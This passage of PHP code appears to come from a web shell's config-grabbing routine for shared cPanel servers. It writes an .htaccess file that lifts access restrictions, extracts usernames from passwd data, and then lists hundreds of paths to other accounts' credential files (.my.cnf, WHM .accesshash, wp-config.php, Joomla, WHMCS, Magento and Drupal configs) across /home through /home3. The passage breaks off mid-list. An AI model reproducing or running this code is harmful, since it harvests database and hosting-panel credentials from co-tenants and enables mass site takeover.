2524.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
2525.         $htc = fopen("cox_config/.htaccess","w");
2526.         fwrite($htc, $isi_htc);
2527.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
2528.         foreach($user_config[1] as $user_cox) {
2529.             $user_config_dir = "/home/$user_cox/public_html/";
2530.             if(is_readable($user_config_dir)) {
2531.                 $grab_config = array(
2532.                                         "/home/$user_cox/.my.cnf" => "cpanel",
2533.                     "/home/$user_cox/.accesshash" => "WHM-accesshash",
2534.                     "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2535.                     "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2536.                     "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2537.                     "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",             
2538.                     "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2539.                     "/home/$user_cox/public_html/forum/config.php" => "phpBB",
2540.                     "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2541.                     "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2542.                     "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
2543.                     "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
2544.                     "/home/$user_cox/public_html/slconfig.php" => "Sitelok",
2545.                     "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",                   
2546.                     "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2547.                     "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2548.                     "/home/$user_cox/public_html/central/configuration.php" => "WHM Central",
2549.                     "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2550.                     "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2551.                     "/home/$user_cox/public_html/submitticket.php" => "WHMCS",                                     
2552.                     "/home/$user_cox/public_html/configuration.php" => "Joomla",                   
2553.                     "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2554.                     "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2555.                     "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",      
2556.                     "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2557.                     "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2558.                     "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2559.                     "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2560.                     "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2561.                     "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2562.                     "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2563.                     "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2564.                     "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2565.                     "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2566.                     "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2567.                     "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2568.                     "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2569.                     "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2570.                     "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2571.                     "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2572.                     "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2573.                     "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2574.                     "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2575.                     "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2576.                     "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2577.                     "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2578.                     "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2579.                     "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2580.                     "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2581.                     "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2582.                     "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2583.                     "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2584.                     "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2585.                     "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2586.                     "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2587.                     "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2588.                     "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                  
2589.                     "/home/$user_cox/public_html/wp-config.php" => "WordPress",
2590.                     "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2591.                     "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2592.                     "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",     
2593.                     "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2594.                     "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2595.                     "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2596.                     "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2597.                     "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2598.                     "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2599.                     "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2600.                     "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2601.                     "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2602.                     "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2603.                     "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2604.                     "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2605.                     "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2606.                     "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2607.                     "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2608.                     "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2609.                     "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2610.                     "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2611.                     "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2612.                     "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2613.                     "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2614.                     "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2615.                     "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2616.                     "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2617.                     "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2618.                     "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2619.                     "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2620.                     "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2621.                     "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2622.                     "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2623.                     "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2624.                     "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2625.                     "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
2626.                                         "/home1/$user_cox/.my.cnf" => "cpanel",
2627.                     "/home1/$user_cox/.accesshash" => "WHM-accesshash",
2628.                     "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2629.                     "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2630.                     "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2631.                     "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
2632.                     "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2633.                     "/home1/$user_cox/public_html/forum/config.php" => "phpBB",
2634.                     "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2635.                     "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2636.                     "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento",
2637.                     "/home1/$user_cox/public_html/admin/config.php" => "OpenCart",
2638.                     "/home1/$user_cox/public_html/slconfig.php" => "Sitelok",
2639.                     "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
2640.                     "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2641.                     "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2642.                     "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central",
2643.                     "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2644.                     "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2645.                     "/home1/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
2646.                     "/home1/$user_cox/public_html/configuration.php" => "Joomla",                  
2647.                     "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2648.                     "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2649.                     "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
2650.                     "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2651.                     "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2652.                     "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2653.                     "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2654.                     "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2655.                     "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2656.                     "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2657.                     "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2658.                     "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2659.                     "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2660.                     "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2661.                     "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2662.                     "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2663.                     "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2664.                     "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2665.                     "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2666.                     "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2667.                     "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2668.                     "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2669.                     "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2670.                     "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2671.                     "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2672.                     "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2673.                     "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2674.                     "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2675.                     "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2676.                     "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2677.                     "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2678.                     "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2679.                     "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2680.                     "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2681.                     "/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2682.                     "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
2683.                     "/home1/$user_cox/public_html/wp-config.php" => "WordPress",
2684.                     "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2685.                     "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2686.                     "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
2687.                     "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2688.                     "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2689.                     "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2690.                     "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2691.                     "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2692.                     "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2693.                     "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2694.                     "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2695.                     "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2696.                     "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2697.                     "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2698.                     "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2699.                     "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2700.                     "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2701.                     "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2702.                     "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2703.                     "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2704.                     "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2705.                     "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2706.                     "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2707.                     "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2708.                     "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2709.                     "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2710.                     "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2711.                     "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2712.                     "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2713.                     "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2714.                     "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2715.                     "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2716.                     "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2717.                     "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2718.                     "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2719.                     "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
2720.                                         "/home2/$user_cox/.my.cnf" => "cpanel",
2721.                     "/home2/$user_cox/.accesshash" => "WHM-accesshash",
2722.                     "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2723.                     "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2724.                     "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2725.                     "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
2726.                     "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2727.                     "/home2/$user_cox/public_html/forum/config.php" => "phpBB",
2728.                     "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2729.                     "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2730.                     "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento",
2731.                     "/home2/$user_cox/public_html/admin/config.php" => "OpenCart",
2732.                     "/home2/$user_cox/public_html/slconfig.php" => "Sitelok",
2733.                     "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
2734.                     "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2735.                     "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2736.                     "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central",
2737.                     "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2738.                     "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2739.                     "/home2/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
2740.                     "/home2/$user_cox/public_html/configuration.php" => "Joomla",                  
2741.                     "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2742.                     "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2743.                     "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
2744.                     "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2745.                     "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2746.                     "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2747.                     "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2748.                     "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2749.                     "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2750.                     "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2751.                     "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2752.                     "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2753.                     "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2754.                     "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2755.                     "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2756.                     "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2757.                     "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2758.                     "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2759.                     "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2760.                     "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2761.                     "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2762.                     "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2763.                     "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2764.                     "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2765.                     "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2766.                     "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2767.                     "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2768.                     "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2769.                     "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2770.                     "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2771.                     "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2772.                     "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2773.                     "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2774.                     "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2775.                     "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2776.                     "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
2777.                     "/home2/$user_cox/public_html/wp-config.php" => "WordPress",
2778.                     "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2779.                     "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2780.                     "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
2781.                     "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2782.                     "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2783.                     "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2784.                     "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2785.                     "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2786.                     "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2787.                     "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2788.                     "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2789.                     "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2790.                     "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2791.                     "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2792.                     "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2793.                     "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2794.                     "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2795.                     "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2796.                     "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2797.                     "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2798.                     "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2799.                     "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2800.                     "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2801.                     "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2802.                     "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2803.                     "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2804.                     "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2805.                     "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2806.                     "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2807.                     "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2808.                     "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2809.                     "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2810.                     "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2811.                     "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2812.                     "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2813.                     "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
2814.                     "/home3/$user_cox/.my.cnf" => "cpanel",
2815.                     "/home3/$user_cox/.accesshash" => "WHM-accesshash",
2816.                     "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2817.                     "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2818.                     "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2819.                     "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
2820.                     "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2821.                     "/home3/$user_cox/public_html/forum/config.php" => "phpBB",
2822.                     "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2823.                     "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2824.                     "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento",
2825.                     "/home3/$user_cox/public_html/admin/config.php" => "OpenCart",
2826.                     "/home3/$user_cox/public_html/slconfig.php" => "Sitelok",
2827.                     "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
2828.                     "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2829.                     "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2830.                     "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central",
2831.                     "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2832.                     "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2833.                     "/home3/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
2834.                     "/home3/$user_cox/public_html/configuration.php" => "Joomla",                  
2835.                     "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2836.                     "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2837.                     "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
2838.                     "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2839.                     "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2840.                     "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2841.                     "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2842.                     "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2843.                     "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2844.                     "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2845.                     "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2846.                     "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2847.                     "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2848.                     "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2849.                     "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2850.                     "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2851.                     "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2852.                     "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2853.                     "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2854.                     "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2855.                     "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2856.                     "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2857.                     "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2858.                     "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2859.                     "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2860.                     "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2861.                     "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2862.                     "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2863.                     "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2864.                     "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2865.                     "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2866.                     "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2867.                     "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2868.                     "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2869.                     "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2870.                     "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
2871.                     "/home3/$user_cox/public_html/wp-config.php" => "WordPress",
2872.                     "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2873.                     "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2874.                     "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
2875.                     "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2876.                     "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2877.                     "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2878.                     "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2879.                     "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2880.                     "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2881.                     "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2882.                     "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2883.                     "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2884.                     "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2885.                     "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2886.                     "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2887.                     "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2888.                     "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2889.                     "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2890.                     "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2891.                     "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2892.                     "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2893.                     "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2894.                     "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2895.                     "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2896.                     "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
